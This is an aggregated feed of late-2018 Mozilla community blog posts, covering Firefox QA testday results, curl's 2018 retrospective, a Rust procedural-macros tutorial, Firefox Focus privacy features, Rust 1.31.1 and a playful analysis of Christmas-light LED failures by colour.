Thank you all for helping us make Mozilla a better place: priyadharshini A.

From the Bangladesh team: Sayed Ibn Masud, Osman Noyon, Alamin Shikder, Farhan Sadik Galib, Tanjia Akter Kona, Hossain Al Ikram, Basirul Fahad, Md. Majedul Islam, Sajedul Islam, Maruf Rahman and Forhad Hossain.
From the India team: Mohammed Adam and Adam24, Mohamed Bawas, Aishwarya Narasimhan@Aishwarya, Showkath begum.J and priyadharshini A.

Results:

– several test cases executed for the <notificationbox> & <notification> changes and Update Directory;
– bugs verified: 1501161, 1509277, 1511751, 1504268, 1501992, 1315509, 1510734, 1511954, 1509711, 1509889, 1511074, 1510734, 1506114, 1505801, 1450973, 1509889, 1511954, 1315509, 1501992, 1512047, 1237076;
– bugs confirmed: 1515995, 1515906;
– bug filled: 1516124;

Thanks for another successful testday! 🙂

Chris PetersonCorrelations Between Firefox Bug Severity and Priority

I was curious whether there were any correlations between Firefox bugs’ Priority and Severity values. My hypothesis was that:

  1. The Severity field would be rarely set to a non-default value. (Mozilla typically uses separate status flags to track blocking bugs and low Priority (P3-P5) for non-urgent issues.)
  2. Priority values would be correlated with Severity. (If a bug is severe, it will probably have a high priority.)

So are there any correlations between Severity and Priority values?

  1. The Severity field was rarely set to a non-default value: about 90% of triaged bugs had the default Severity (“Normal”), regardless of Priority. So Severity was not correlated with Priority.
  2. However, Priority was correlated with Severity: about 85% of triaged bugs with Severity “Blocker” had Priority P1. About 30-50% of bugs with other Severity values had Priority P3.

There are a lot of Firefox bugs in Bugzilla. To narrow the scope of my analysis, I selected bugs from the Firefox desktop product (Bugzilla Product “Firefox” or “Core”) that were filed and triaged within the last two years.

I ignored bugs filed more than two years ago because Mozilla’s use of the Priority field has changed over time. The last two years roughly cover the current era of bug triage and prioritization practices where Priority values have the following meaning:

  • P1 = Fix in the current release or iteration
  • P2 = Fix in the next release or iteration
  • P3 = Backlog
  • P4 = There is no P4. (This Priority is not supposed to be used, though it still is.)
  • P5 = “Patches accepted”

I ignore bugs with Priority “–” (the default and untriaged) and P4 because these values are not set by triagers. P1 bugs may be overrepresented because, in theory, P2 bugs are not supposed to be fixed in the current release and should be elevated to P1 to be scheduled for fixing in the current release. I also ignored bugs that were resolved as Invalid, Duplicate, or Wontfix because they are unlikely to have accurate Priority or Severity values.

Distribution of Priority values:

  • 20.36% P1
  • 18.76% P2
  • 47.56% P3
  • 13.32% P5

Distribution of Severity values:

  • 0.15% Blocker
  • 5.53% Critical
  • 0.87% Major
  • 89.39% Normal (the default)
  • 0.87% Minor
  • 0.31% Trivial
  • 2.88% Enhancement

In conclusion, I propose that the Firefox Bugzilla not even show the Severity field. It’s not used to track which bugs block a given release or which bugs should be fixed first. For my raw bug data, see this spreadsheet.

Daniel StenbergA curl 2018 retrospective

Another year reaches its calendar end and a new year awaits around the corner. In the curl project we’ve had another busy and event-full year. Here’s a look back at some of the fun we’ve done during 2018.

Releases

We started out the year with the 7.58.0 release in January, and we managed to squeeze in another six releases during the year. In total we count 658 documented bug-fixes and 31 changes. The total number of bug-fixes was actually slightly lower this year compared to last year’s 683. An average of 1.8 bug-fixes per day is still not too shabby.

Authors

I’m very happy to say that we again managed to break our previous record as 155 unique authors contributed code. 111 of them for the first time in the project, and 126 did fewer than three commits during the year. Basically this means we merged code from a brand new author every three days through-out the year!

The list of “contributors”, where we also include helpers, bug reporters, security researchers etc, increased with another 169 new names this year to a total of 1829 in the last release of the year. That’s 169 new names. Of course we also got a lot of help from people who were already mentioned in there!

Will we be able to reach 2000 names before the end of 2019?

Commits

At the time of this writing, almost two weeks before the end of the year, we’re still behind the last few years with 1051 commits done this year. 1381 commits were done in 2017.

Daniel’s commit share

I personally authored 535 (50.9%) of all commits during 2018. Marcel Raad did 65 and Daniel Gustafsson 61. In general I maintain my general share of the changes done in the project over time. Possibly I’ve even increased it slightly the last few years. This graph shows my share of the commits layered on top of the number of commits done.

Vulnerabilities

This year we got exactly the same amount of security problems reported as we did last year: 12. Some of the problems were one-off due curl being added to the OSS-Fuzz project in 2018 and it has taken a while to really hit some of our soft spots and as we’ve seen a slow-down in reports from there it’ll be interesting to see if 2019 will be a brighter year in this department. (In total, OSS-Fuzz is credited for having found six security vulnerabilities in curl to date.)

During the year we manage to both introduce new bug bounty program as well as retract that very same again when it shut down almost at once! 🙁

Lines of code

Counting all lines in the git repo in the src, lib and include directories, they grew nearly 6,000 lines (3.7%) during the year to 155,912. The primary code growing activities this year were:

  1. DNS-over-HTTPS support
  2. The new URL API and using that internally as well

Deprecating legacy

In July we created the DEPRECATE.md document to keep order of some things we’re stowing away in the cyberspace attic. During the year we cut off axTLS support as a first example of this deprecation procedure. HTTP pipelining, global DNS cache and HTTP/0.9 accepted by default are features next in line marked for removal, and the two first are already disabled in code.

curl up

We had our second curl conference this year; in Stockholm. It was blast again and I’m already looking forward to curl up 2019 in Prague.

Sponsor updates

Yours truly quit Mozilla and with that we lost them as a sponsor of the curl project. We have however gotten several new backers and sponsors over the year since we joined opencollective, and can receive donations from there.

Governance

Together with a bunch of core team members I put together a two-step proposal that I posted back in October:

  1. we join an umbrella organization
  2. we create a “board” to decide over money

As the first step turned out to be a very slow operation (ie we’ve applied, but the process has not gone very far yet) we haven’t yet made step 2 happen either.

2019

Things that didn’t happen in 2018 but very well might happen in 2019 include:

  1. Some first HTTP/3 and QUIC code attempts in curl
  2. HSTS support? A pull request for this has been lingering for a while already.

Note: the numbers for 2018 in this post were extracted and graphs were prepared a few weeks before the actual end of year, so some of the data quite possibly changed a little bit since.

Ludovic HirlimannDecember 2018 - what extensions do I use in Firefox desktop

Here is the current list of extensions I have in my Firefox desktop nightly profile :

Firefox Multi-Account Containers

This let's me use Containers , in a smoother fashion, if forces some domains to be opened in type of container. For instance Facebook is forced to my shopping container (and that's the only thing going into that container).

Grammalecte && Grammarly for Firefox

because I'm so bad at spelling and grammar. These free tools help me with both french and English. I'd use druide's Antidote if I wasn't so cheap.

HTTPS everywhere

Less needed than a few years ago, it helps me secure my web exploration.

Mastodon Share

Because I use Mastodon as my preferred social network and that Mastodon button are not always present on websites. I hope that with the demise of G+, g+ share buttons will be replace with mastodon ones.

Pinboard

Because I liked sharing and saving my bookmarks (delicio.us was a very nice social experience).

Security Report Card

Cause I like to make the web more secure and , I can easily spot the rating when visiting a site. This let's me quickly decide that I will contact the site owner of not and let him know that his site could be configured better.

Universal Amazon Killer

So I don't have to search too much and can use amazon as a search engine and then shop locally

Wayback machine

so I don't stumble too much on 404 :)

First Party Isolation

because I was too lazy to flip a preference.

Daniel StenbergHTTP/3 talk in Stockholm on January 22

HTTP/3 – the coming HTTP version

This time TCP is replaced by the new transport protocol QUIC and things are different yet again! This is a presentation by Daniel Stenberg about HTTP/3 and QUIC with a following Q&A about everything HTTP.

The presentation will be done in English. It will be recorded and possibly live-streamed. Organized by me, together with our friends at goto10. It is free of charge, but you need to register.

When

17:30 – 19:00
January 22, 2019

Goto 10: Hörsalen, Hammarby Kaj 10D plan 5

Register here!

Fancy map to goto 10


Mozilla Open Policy & Advocacy BlogPrivacy in practice: Mozilla talks “lean data” in India

How can businesses best implement privacy principles? On November 26th, Mozilla hosted its first “Privacy Matters” event in New Delhi, bringing together representatives from some of India’s leading and upcoming online businesses. The session was aimed at driving a practical conversation around how companies can better protect user data, and the multiple incentives to do so.

This conversation is timely. The European GDPR came into force this May and had ripple effects on many Indian companies. India itself is well on its way to having its first comprehensive data protection law. We’ve been vocal in our support for a strong law, see here and here for our submissions to the Indian government. Conducted with Mika Shah, Lead Product and Data Counsel at Mozilla Headquarters in Mountain View, the meeting saw participation from thirteen companies in India, ranging from SMEs to large conglomerates, including Zomato, Ibibo, Dunzo, Practo and Zeotap. There was a mix of representatives across engineering, c-level, and legal/policy teams of these companies. The discussions were divided into three segments as per Mozilla’s Lean Data framework, covering key topics: “Engage users”, “Stay Lean”, and “Build-in Security”.

Engage Users

The first segment of the discussion focussed on how companies can better engage different audiences on issues of privacy. This ranges from making privacy policies more accessible and explaining data collection through “just-in-time” notifications to users to better engaging investors and boards on privacy concerns to gain their support for implementing reforms. Many companies argued that providing more choices to the Indian user base throws up unique challenges, and that often users can be disinterested or careless about their making choices about their personal data. This only reinforces the importance of user-education and companies agreed they could do more to effectively communicate about data collection, use, and sharing.

Stay lean

The second section was on the importance of staying “lean” with personal data rather than collecting, storing, and sharing indiscriminately. Most companies agreed that collecting and storing less personal data mitigates the risk of potential privacy leaks, breaches, and vulnerability to broad law enforcement requests. Staying lean does come with its own challenges, given that deleting data trails often comes at a high cost, or may be technically challenging when data has changed hands across vendors. It was agreed that there is a need for more innovative techniques to help pseudonymize or anonymize such datasets to reduce the risk of identification of end-users while maintaining the value of service. Despite these challenges, responsible companies should do their best to adhere to the principle of deleting data within their control, when no longer required.

Build-in security

The final segment covered key security features that could be built in to the services. For many startups, their emphasis on security practices, especially relating to employee data access controls, have increased as they grew in size. Participants in the event also spoke to concerns around the security practices of their vendors; these corporate partners often resist scrutiny of their security and/or are unwilling to negotiate terms, making it hard for companies to meet their obligations to their users and under the law.

Following the event, all of the participants confirmed that they’re intending to make changes to their privacy practices. It’s great to see such enthusiasm and commitment to protecting user privacy and championing these issues within their respective companies. We look forward to hosting further iterations of this event in India. For more information about the Lean Data Practices, see: https://www.leandatapractices.com/

 

The post Privacy in practice: Mozilla talks “lean data” in India appeared first on Open Policy & Advocacy.

The Rust Programming Language BlogProcedural Macros in Rust 2018

Perhaps my favorite feature in the Rust 2018 edition is procedural macros. Procedural macros have had a long and storied history in Rust (and will continue to have a storied future!), and now is perhaps one of the best times to get involved with them because the 2018 edition has so dramatically improved the experience both defining and using them.

Here I'd like to explore what procedural macros are, what they're capable of, notable new features, and some fun use cases of procedural macros. I might even convince you that this is Rust 2018's best feature as well!

What is a procedural macro?

First defined over two years ago in RFC 1566, procedural macros are, in layman's terms, a function that takes a piece of syntax at compile time and produces a new bit of syntax. Procedural macros in Rust 2018 come in one of three flavors:

  • #[derive] mode macros have actually been stable since Rust 1.15 and bring all the goodness and ease of use of #[derive(Debug)] to user-defined traits as well, such as Serde's #[derive(Deserialize)].

  • Function-like macros are newly stable to the 2018 edition and allow defining macros like env!("FOO") or format_args!("...") in a crates.io-based library. You can think of these as sort of "macro_rules! macros" on steroids.

  • Attribute macros, my favorite, are also new in the 2018 edition and allow you to provide lightweight annotations on Rust functions which perform syntactical transformations over the code at compile time.

Each of these flavors of macros can be defined in a crate with proc-macro = true specified in its manifest. When used, a procedural macro is loaded by the Rust compiler and executed as the invocation is expanded. This means that Cargo is in control of versioning for procedural macros and you can use them with all same ease of use you'd expect from other Cargo dependencies!

Defining a procedural macro

Each of the three types of procedural macros are defined in a slightly different fashion, and here we'll single out attribute macros. First, we'll flag Cargo.toml:

[lib]
proc-macro = true

and then in src/lib.rs we can write our macro:

extern crate proc_macro;
use proc_macro::TokenStream;

#[proc_macro_attribute]
pub fn hello(attr: TokenStream, item: TokenStream) -> TokenStream {
    // ...
}

We can then write some unit tests in tests/smoke.rs:

#[my_crate::hello]
fn wrapped_function() {}

#[test]
fn works() {
    wrapped_function();
}

... and that's it! When we execute cargo test Cargo will compile our procedural macro. Afterwards it will compile our unit test which loads the macro at compile time, executing the hello function and compiling the resulting syntax.

Right off the bat we can see a few important properties of procedural macros:

  • The input/output is this fancy TokenStream type we'll talk about more in a bit
  • We're executing arbitrary code at compile time, which means we can do just about anything!
  • Procedural macros are incorporated with the module system, meaning they can be imported just like any other name.

Before we take a look at implementing a procedural macro, let's first dive into some of these points.

Macros and the module system

First stabilized in Rust 1.30 (noticing a trend with 1.15?) macros are now integrated with the module system in Rust. This mainly means that you no longer need the clunky #[macro_use] attribute when importing macros! Instead of this:

#[macro_use]
extern crate log;

fn main() {
    debug!("hello, ");
    info!("world!");
}

you can do:

use log::info;

fn main() {
    log::debug!("hello, ");
    info!("world!");
}

Integration with the module system solves one of the most confusing parts about macros historically. They're now imported and namespaced just as you would any other item in Rust!

The benefits are not only limited to bang-style macro_rules macros, as you can now transform code that looks like this:

#[macro_use]
extern crate serde_derive;

#[derive(Deserialize)]
struct Foo {
    // ...
}

into

use serde::Deserialize;

#[derive(Deserialize)]
struct Foo {
    // ...
}

and you don't even need to explicitly depend on serde_derive in Cargo.toml! All you need is:

[dependencies]
serde = { version = '1.0.82', features = ['derive'] }

What's inside a TokenStream?

This mysterious TokenStream type comes from the compiler-provided proc_macro crate. When it was first added all you could do with a TokenStream was call convert it to or from a string using to_string() or parse(). As of Rust 2018, you can act on the tokens in a TokenStream directly.

A TokenStream is effectively "just" an iterator over TokenTree. All syntax in Rust falls into one of these four categories, the four variants of TokenTree:

  • Ident is any identifier like foo or bar. This also contains keywords such as self and super.
  • Literal include things like 1, "foo", and 'b'. All literals are one token and represent constant values in a program.
  • Punct represents some form of punctuation that's not a delimiter. For example . is a Punct token in the field access of foo.bar. Multi-character punctuation like => is represented as two Punct tokens, one for = and one for >, and the Spacing enum says that the = is adjacent to the >.
  • Group is where the term "tree" is most relevant, as Group represents a delimited sub-token-stream. For example (a, b) is a Group with parentheses as delimiters, and the internal token stream is a, b.

While this is conceptually simple, this may sound like there's not much we can do with this! It's unclear, for example, how we might parse a function from a TokenStream. The minimality of TokenTree is crucial, however, for stabilization. It would be infeasible to stabilize the Rust AST because that means we could never change it. (imagine if we couldn't have added the ? operator!)

By using TokenStream to communicate with procedural macros, the compiler is able to add new language syntax while also being able to compile and work with older procedural macros. Let's see now, though, how we can actually get useful information out of a TokenStream.

Parsing a TokenStream

If TokenStream is just a simple iterator, then we've got a long way to go from that to an actual parsed function. Although the code is already lexed for us we still need to write a whole Rust parser! Thankfully though the community has been hard at work to make sure writing procedural macros in Rust is as smooth as can be, so you need look no further than the syn crate.

With the syn crate we can parse any Rust AST as a one-liner:

#[proc_macro_attribute]
pub fn hello(attr: TokenStream, item: TokenStream) -> TokenStream {
    let input = syn::parse_macro_input!(item as syn::ItemFn);
    let name = &input.ident;
    let abi = &input.abi;
    // ...
}

The syn crate not only comes with the ability to parse built-in syntax but you can also easily write a recursive descent parser for your own syntax. The syn::parse module has more information about this capability.

Producing a TokenStream

Not only do we take a TokenStream as input with a procedural macro, but we also need to produce a TokenStream as output. This output is typically required to be valid Rust syntax, but like the input it's just list of tokens that we need to build somehow.

Technically the only way to create a TokenStream is via its FromIterator implementation, which means we'd have to create each token one-by-one and collect it into a TokenStream. This is quite tedious, though, so let's take a look at syn's sibling crate: quote.

The quote crate is a quasi-quoting implementation for Rust which primarily provides a convenient macro for us to use:

use quote::quote;

#[proc_macro_attribute]
pub fn hello(attr: TokenStream, item: TokenStream) -> TokenStream {
    let input = syn::parse_macro_input!(item as syn::ItemFn);
    let name = &input.ident;

    // Our input function is always equivalent to returning 42, right?
    let result = quote! {
        fn #name() -> u32 { 42 }
    };
    result.into()
}

The quote! macro allows you to write mostly-Rust syntax and interpolate variables quickly from the environment with #foo. This removes much of the tedium of creating a TokenStream token-by-token and allows quickly cobbling together various pieces of syntax into one return value.

Tokens and Span

Perhaps the greatest feature of procedural macros in Rust 2018 is the ability to customize and use Span information on each token, giving us the ability for amazing syntactical error messages from procedural macros:

error: expected `fn`
 --> src/main.rs:3:14
  |
3 | my_annotate!(not_fn foo() {});
  |              ^^^^^^

as well as completely custom error messages:

error: imported methods must have at least one argument
  --> invalid-imports.rs:12:5
   |
12 |     fn f1();
   |     ^^^^^^^^

A Span can be thought of as a pointer back into an original source file, typically saying something like "the Ident token foo came from file bar.rs, line 4, column 5, and was 3 bytes long". This information is primarily used by the compiler's diagnostics with warnings and error messages.

In Rust 2018 each TokenTree has a Span associated with it. This means that if you preserve the Span of all input tokens into the output then even though you're producing brand new syntax the compiler's error messages are still accurate!

For example, a small macro like:

#[proc_macro]
pub fn make_pub(item: TokenStream) -> TokenStream {
    let result = quote! {
        pub #item
    };
    result.into()
}

when invoked as:

my_macro::make_pub! {
    static X: u32 = "foo";
}

is invalid because we're returning a string from a function that should return a u32, and the compiler will helpfully diagnose the problem as:

error[E0308]: mismatched types
 --> src/main.rs:1:37
  |
1 | my_macro::make_pub!(static X: u32 = "foo");
  |                                     ^^^^^ expected u32, found reference
  |
  = note: expected type `u32`
             found type `&'static str`

error: aborting due to previous error

And we can see here that although we're generating brand new syntax, the compiler can preserve span information to continue to provide targeted diagnostics about code that we've written.

Procedural Macros in the Wild

Ok up to this point we've got a pretty good idea about what procedural macros can do and the various capabilities they have in the 2018 edition. As such a long-awaited feature, the ecosystem is already making use of these new capabilities! If you're interested, some projects to keep your eyes on are:

  • syn, quote, and proc-macro2 are your go-to libraries for writing procedural macros. They make it easy to define custom parsers, parse existing syntax, create new syntax, work with older versions of Rust, and much more!

  • Serde and its derive macros for Serialize and Deserialize are likely the most used macros in the ecosystem. They sport an impressive amount of configuration and are a great example of how small annotations can be so powerful.

  • The wasm-bindgen project uses attribute macros to easily define interfaces in Rust and import interfaces from JS. The #[wasm_bindgen] lightweight annotation makes it easy to understand what's coming in and out, as well as removing lots of conversion boilerplate.

  • The gobject_gen! macro is an experimental IDL for the GNOME project to define GObject objects safely in Rust, eschewing manually writing all the glue necessary to talk to C and interface with other GObject instances in Rust.

  • The Rocket framework has recently switched over to procedural macros, and showcases some of nightly-only features of procedural macros like custom diagnostics, custom span creation, and more. Expect to see these features stabilize in 2019!

That's just a taste of the power of procedural macros and some example usage throughout the ecosystem today. We're only 6 weeks out from the original release of procedural macros on stable, so we've surely only scratched the surface as well! I'm really excited to see where we can take Rust with procedural macros by empowering all kinds of lightweight additions and extensions to the language!

Mozilla Addons BlogExtensions in Firefox 65

In lieu of the normal, detailed review of WebExtensions API coming out in Firefox 65, I’d like to simply say thank you to everyone for choosing Firefox. Now, more than ever, the web needs people who consciously decide to support an open, private, and safe online ecosystem.

Two weeks ago, nearly every Mozilla employee gathered in Orlando, Florida for the semi-annual all-hands meeting.  It was an opportunity to connect with remote teammates, reflect on the past year and begin sharing ideas for the upcoming year. One of the highlights was the plenary talk by Mitchell Baker, Chairwoman of the Mozilla Foundation. If you have not seen it, it is well worth 15 minutes of your time.

Mitchell talks about Firefox continually adapting to a changing internet, shifting its engagement model over time to remain relevant while staying true to its original mission. Near the end, she notes that it is time, once again, for Mozilla and Firefox to evolve, to shift from being merely a gateway to the internet to being an advocate for users on the internet.

Extensions will need to be part of this movement. We started when Firefox migrated to the WebExtensions API (only a short year ago), ensuring that extensions operated with explicit user permissions within a well-defined sandbox. In 2018, we made a concerted effort to not just add new API, but to also highlight when an extension was using those API to control parts of the browser. In 2019, expect to see us sharpen our focus on user privacy, user security, and user agency.

Thank you again for choosing Firefox, you have our deepest gratitude and appreciation. As a famous Mozillian once said, keep on rockin’ the free web.

-Mike Conca

Highlights of new features and fixes in Firefox 65:

A huge thank you to the community contributors in this release, including: Ben Armstrong, Oriol Brufau, Tim Nguyen, Ryan Hendrickson, Sean Burke, Yuki “Piro” Hiroshi, Diego Pino, Jan Henning, Arshad Kazmi, Nicklas Boman.

 

The post Extensions in Firefox 65 appeared first on Mozilla Add-ons Blog.

The Mozilla BlogLatest Firefox Focus provides more user control

The Internet is a huge playground, but also has a few dark corners. In order to ensure that users still feel secure and protected while browsing, we’ve implemented features that offer privacy and control in all of our products, including Firefox Focus.

Today’s release truly reflects this philosophy: Android users can now individually decide which publishers they want to share data with and are warned when they access risky content. We also have an update for iOS users with Search Suggestions.

Enhanced privacy settings in Firefox Focus

We initially created Firefox Focus to provide smartphone users with a tracking-free browsing experience that allows them to feel safe when navigating the web, and do it faster, too. However, cookies and trackers can create snail-paced experiences, and are also used to follow users across the Internet  often times without their knowledge. At Firefox, we are committed to giving users control and letting them decide what information is collected about them, which is why we recently introduced our Enhanced Tracking Protection approach and added corresponding improvements to Firefox for desktop. Today we are pleased to announce that Firefox Focus is following this lead.

Now you have more choices. You can choose to block all cookies on a website, no cookies at all  the default so far , third party cookies or only 3rd party tracking cookies as defined by Disconnect’s Tracking Protection list. If you go with the latter option, which is new to Firefox Focus and also the new default, cross-site tracking will be prevented. This enables you to allow cookies if they contribute to the user experience for a website while still preventing trackers from being able to track you across multiple sites, offering you the same products over and over again and recording your online behavior.

Firefox Focus now allows users to choose individually which cookies to accept.

When you block cookies, you might find that some pages may no longer work properly. But no worries, we’re here to offer a solution: With just 2 clicks you can now add websites to the new Firefox Focus “allowlist”, which unblocks cookies and trackers for the current page visit. As soon as you navigate to another website, the setting resets so you don’t have to worry about a forgotten setting that could weaken your privacy.

The new Firefox Focus allowlist unblocks cookies and trackers for the current page visit.

An update on GeckoView

In October we were happy to announce that Firefox Focus was going to be powered by Mozilla’s own mobile engine GeckoView. It allows us to implement many amazing new features. We are currently working on a good deal of under-the-hood improvements to enhance the performance of GeckoView. Occasionally some minor bugs may still occur and we’re looking forward to gathering your feedback, learning from your experiences with GeckoView and improving the engine accordingly.

In order to provide our users with another GeckoView sneak peek and something to test, we’re proud to also provide a new feature today: Thanks to in-browser security warnings, your mobile web browsing will now be a lot less risky. Firefox Focus will check URLs against Google’s constantly updated lists of unsafe web resources, which includes phishing and other fraudulent sites, and will provide an alert if you reach an unsafe site. You may then either follow to safety, or ignore to continue navigating to the requested site. After all, we value users’ right to choose how to browse, and want to make sure they’re able to make informed choices.

Firefox Focus now warns against phishing and other fraudulent sites.

Firefox Focus for iOS now supports search suggestions

Search suggestions are an important component of searching the web and can make it so much more convenient. That’s why we’re making this feature available to iOS users today, after introducing it to Firefox Focus for Android in October. You can easily activate the feature by opening the app settings > click on “Search” > and select “Get search suggestions”.

New for iOS users: get search suggestions and find what you’re looking for even faster!

Get Firefox Focus now

The latest version of Firefox Focus for Android and iOS is now available for download on Google Play and in the App Store.

The post Latest Firefox Focus provides more user control appeared first on The Mozilla Blog.

The Mozilla BlogCreate, test, innovate, repeat.

Let’s imagine a not-too-distant future:

Imagine you are somewhere that is familiar to you such as your home, or your favorite park.

Imagine that everything around you is connected and it has a link.

Imagine you have the internet in your ears and you can speak directly to it.

Imagine that instead of 2D screens around you, the air is alive with knowledge and wonder.

Imagine that you are playing your favorite game with your friend while they are virtually sitting next to you.

 

Now, imagine what that looks like covered in ads. Malware is everywhere, and you have no control over what you see or hear.


Technology will continue to shape our lives and our future, but what that future looks like is up to us. We are excited about the internet growing and evolving, but new possibilities bring new challenges. We don’t need to give up control of our personal lives in exchange for great products that rely on personal data for ads. Here at Mozilla, we are working hard to make sure that new technologies evolve in a way that champion privacy and choice.

We do this by engaging with engineers, teachers, researchers, developers, creators, artists, and thinkers around the globe to ensure that every voice is heard. We are constantly building new prototypes and experimental products for platforms that have the potential to build a different kind of web experience.

Today, Mozilla is launching a new Mozilla Labs. This is our online space where anyone can find our latest creations, innovations, and cutting-edge technologies.

What will you find at Mozilla Labs?

Download our WebXR Viewer for iOS, where you can get a sneak peek of experiencing augmented reality inside web browser.

Create new virtual environments with Spoke, and then experience them with friends using Hubs by Mozilla.

Contribute to Common Voice, where we help voice systems understand people from diverse backgrounds and put expensive voice data at the hands of independent creators

Get started with Project Things, where we are building a decentralized ‘Internet of Things’ that is focused on security, privacy, and interoperability.

Install Firefox Reality and browse the immersive web completely in virtual reality.

Those are just a few of the future technologies we worked on in 2018, and we are just getting started. As we ramp up for 2019, we will continue to innovate across platforms such as Virtual Reality, Augmented Reality, Internet of Things, Speech/Voice, Artificial Intelligence, Open Web Technologies, and so much more.

You can check out our cutting-edge projects on Mozilla Labs, or you can roll up your sleeves and contribute to one of our many open source projects. Together we can collectively build the future we want to see.

The post Create, test, innovate, repeat. appeared first on The Mozilla Blog.

The Rust Programming Language BlogAnnouncing Rust 1.31.1

The Rust team is happy to announce a new version of Rust, 1.31.1. Rust is a systems programming language focused on safety, speed, and concurrency.

If you have a previous version of Rust installed via rustup, getting Rust 1.31.1 is as easy as:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.31.1 on GitHub.

What's in 1.31.1 stable

This patch release fixes a build failure on powerpc-unknown-netbsd by way of an update to the libc crate used by the compiler.

Additionally, the Rust Language Server was updated to fix two critical bugs. First, hovering over the type with documentation above single-line attributes led to 100% CPU usage:

/// Some documentation
#[derive(Debug)] // Multiple, single-line
#[allow(missing_docs)] // attributes
pub struct MyStruct { /* ... */ }

Go to definition was fixed for std types: Before, using the RLS on HashMap, for example, tried to open this file

~/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/libstd/collections/hash/map.rs

and now RLS goes to the correct location (for Rust 1.31, note the extra src):

~/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/src/libstd/collections/hash/map.rs

Daniel StenbergWhy is curl different everywhere?

At a talk I did a while ago, someone from the back of the audience raised this question. I found it to be such a great question that I decided to spend a few minutes and explain how this happens and why.

In this blog post I’ll stick to discussing the curl command line tool. “curl” is often also used as a shortcut for the library but let’s focus on the tool here.

When you use a particular curl version installed in a system near you, chances are that it differs slightly from the curl your neighbor runs or even the one that you use in the machines at work.

Why is this?

Versions

We release a new curl version every eight weeks. On average we ship over thirty releases in a five-year period.

A lot of people use curl versions that are a few years old, some even many years old. There are easily more than 30 different curl version in active use at any given moment.

Not every curl release introduce changes and new features, but it is very common and all releases are at least always corrected a lot of bugs from previous versions. New features and fixed bugs make curl different between releases.

Linux/OS distributions tend to also patch their curl versions at times, and then they all of course have different criteria and work flows, so the exact same curl version built and shipped from two different vendors can still differ!

Platforms

curl builds on almost every platform you can imagine. When you build curl for your platform, it is designed to use features, native APIs and functions available and they will indeed differ between systems.

curl also relies on a number of different third party libraries. The set of libraries a particular curl build is set to use varies by platform, but even more so due to the decisions of the persons or group that built this particular curl executable. The exact set, and the exact versions of each of those third party libraries, will change curl’s feature set, from subtle and small changes up to large really noticeable differences.

TLS libraries

As a special third party library, I want to especially highlight the importance of the TLS library that curl is built to use. It will change not only what SSL and TLS versions curl supports, but also how to handle CA certificates, it provides crypto support for authentication schemes such as NTLM and more. Not to mention that of course TLS libraries also develop over time so if curl is built to use an older release, it probably has less support for later features and protocol versions.

Feature shaving

When building curl, you can switch features on and off to a very large extent, making it possible to quite literally build it in several million different combinations. The organizations, people and companies that build curl to ship with their operating systems or their package distribution systems decide what feature set they want or don’t want for their users. One builder’s decision and thought process certainly does not have to match the ones of the others’. With the same curl version, the same TLS library on the same operating system two curl builds might thus still end up different!

Build your own!

If you aren’t satisfied with the version or feature-set of your own locally installed curl – build your own!

Chris H-CData Science is Festive: Christmas Light Reliability by Colour

This past weekend was a balmy 5 degrees Celsius which was lucky for me as I had to once again climb onto the roof of my house to deal with my Christmas lights. The middle two strings had failed bulbs somewhere along their length and I had a decent expectation that it was the Blue ones. Again.

Two years ago was our first autumn at our new house. The house needed Christmas lights so we bought four strings of them. Over the course of their December tour they suffered devastating bulb failures rendering alternating strings inoperable. (The bulbs are wired in a single parallel strand making a single bulb failure take down the whole string. However, connectivity is maintained so power flows through the circuit.)

20181104_111900

Last year I tested the four strings and found them all faulty. We bought two replacement strings and I scavenged all the working bulbs from one of the strings to make three working strings out of the old four. All five (four in use, one in reserve) survived the season in working order.

20181104_111948

This year in performing my sanity check before climbing the ladder I had to replace lamps in all three of the original strings to get them back to operating condition. Again.

And then I had an idea. A nerdy idea.

I had myself a wonderful nerdy idea!

“I know just what to do!” I laughed like an old miser.

I’ll gather some data and then visualize’er!

The strings are penta-colour: Red, Orange, Yellow, Green, and Blue. Each string has about an equal number of each colour of bulb and an extra Red and Yellow replacement bulb. Each bulb is made up of an internal LED lamp and an external plastic globe.

The LED lamps are the things that fail either from corrosion on the contacts or from something internal to the diode.

So I started with 6N+12 lamps and 6N+12 globes in total: N of each colour with an extra 1 Red and 1 Yellow per string. Whenever a lamp died I kept its globe. So the losses over time should manifest themselves as a surplus of globes and a defecit of lamps.

If the losses were equal amongst the colours we’d see a equal surplus of Green, Orange, and Blue globes and a slightly lower surplus of Red and Yellow globes (because of the extras). This is not what I saw when I lined them all up, though:

An image of christmas lightbulb globes and LED lamps in a histogram fashion. The blue globes are the most populous followed by yellow, green, then red. Yellow LED lamps are the most populous followed by red and green.

Instead we find ourselves with no oranges (I fitted all the extra oranges into empty blue spots when consolidating), an equal number of lamps and globes of yellow (yellow being one of the colours adjacent to most broken bulbs and, thus, less likely to be chosen for replacement), a mild surplus of red (one red lamp had evidently failed at one point), a larger surplus of green globes (four failed green lamps isn’t great but isn’t bad)…

And 14 excess blue globes.

Now, my sampling frequency isn’t all that high. And my knowledge of confidence intervals is a little rusty. But that’s what I think I can safely call a statistical outlier. I’m pretty sure we can conclude that, on my original set of strings of Christmas lights, Blue LEDs are more likely to fail than any other colour. But why?

I know from my LED history that high-luminance blue LEDs took the longest to be invented (patents filed in 1993 over 30 years after the first red LED). I learned from my friend who works at a display company that blue LEDs are more expensive. If I take those together I can suppose that perhaps the manufacturers of my light strings cheaped out on their lot of blue LEDs one year and stuck me, the consumer, with substandard lamps.

Instead of bringing joy, it brought frustration. But also predictive power because, you know what? On those two broken strings I had to climb up to retrieve this past, unseasonably-warm Saturday two of the four failed bulbs were indeed, as I said at the top, the Blue ones. Again.

 

:chutten

This Week In RustThis Week in Rust 265

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is yaserde, a specialized XML (de)serialization crate compatible with serde. Thanks to Marc Antoine Arnaud for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

